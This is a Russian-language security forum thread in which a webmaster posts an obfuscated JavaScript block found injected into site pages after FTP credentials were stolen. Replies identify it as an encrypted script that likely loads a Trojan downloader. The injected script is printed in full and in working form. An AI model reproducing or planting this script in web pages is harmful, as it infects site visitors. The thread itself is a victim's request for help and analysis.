Показано с 1 по 3 из 3.

Неизвестный код на сайте после кражи FTP-паролей (заявка № 13839)

  1. #1
    Junior Member Репутация
    Регистрация
    03.11.2007
    Сообщений
    1
    Вес репутации
    60

    Неизвестный код на сайте после кражи FTP-паролей

    Здравствуйте, уважаемые эксперты.

    Подскажите, что это может быть? Вставилось на все главные страницы сайтов, расположенных на одной хостинг-площадке, логин и пароль от которой был сохранен в FTP-клиенте.

    Код:
    </body>
    </html>
    <!-- ~ --><script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&45&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&4:&49&3d&42&41&49&3d&45&49&3d&4:&4:&3d&42&41&48&3d&42&41&42&3d&42&42&45&3d&45&47&3d&42&41&46&3d&42&42&41&3d&42&41&43&3d&42&42&42&3d&45&48&3d&42&41&46&3d&42&42&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&45&3d&44&43&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&45&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&45&3d&42&41&41&3d&42&41&46&3d&42&42&46&3d&42&42&43&3d&42&41&49&3d&4:&48&3d&42&43&42&3d&46&49&3d&42&42&41&3d&42&42&42&3d&42&42&41&3d&42&41&42&3d&44&45&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&42&44&3d&42&41&3d&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&45&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&42&42&47&3d&4:&48&3d&42&41&48&3d&42&41&42&3d&42&42&41&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&42&42&46&3d&45&47&3d&4:&4:&3d&42&42&41&3d&45&48&3d&42&41&46&3d&42&42&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&45&3d&44&43&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&45&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&45&3d&42&41&41&3d&42&41&46&3d&42&42&46&3d&42&42&43&3d&42&41&49&3d&4:&48&3d&42&43&42&3d&46&49&3d&42&42&41&3d&42&42&42&3d&42&42&41&3d&42&41&42&3d&44&45&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&42&44&3d&42&41&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = ""; 
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); 
    document.write(result); </script><!-- ~ -->
    Обнаружил случайно, в статус баре браузера какие-то китайские домены появились при загрузке страницы (worldstat.cn и др.).

    Что это за код, что он делает, в чем его вред?
    Заранее спасибо.
    Последний раз редактировалось Макcим; 04.11.2007 в 10:40. Причина: Вставил тег [CODE]

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для AndreyKa
    Регистрация
    08.01.2005
    Адрес
    Россия
    Сообщений
    13,632
    Вес репутации
    1315
    Я не экспер. Могу сказать только то, что это защифрованный скрипт. Такие обычно запускают какой-нибудь Trojan.Downloader, который может скачать запустить все что угодно.
    Советую сделать все по Правилам на компьютере с которого похитили пароль.

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    21.04.2005
    Адрес
    Perm, Russia
    Сообщений
    5,794
    Вес репутации
    2292
    Присоединюсь к AndreyKa. Вам лучше выполнить правила, так как, скорее всего, ваш ПК заражен.

  • Уважаемый(ая) webbmaster, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Trojan.Win32.Ddox.ci– Предназначен для кражи паролей
      От 1Оксана1 в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 26.07.2011, 06:41
    2. Кражи паролей к FTP
      От restore в разделе Помогите!
      Ответов: 7
      Последнее сообщение: 15.08.2010, 22:14
    3. Ответов: 5
      Последнее сообщение: 18.08.2009, 22:56

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00904 seconds with 19 queries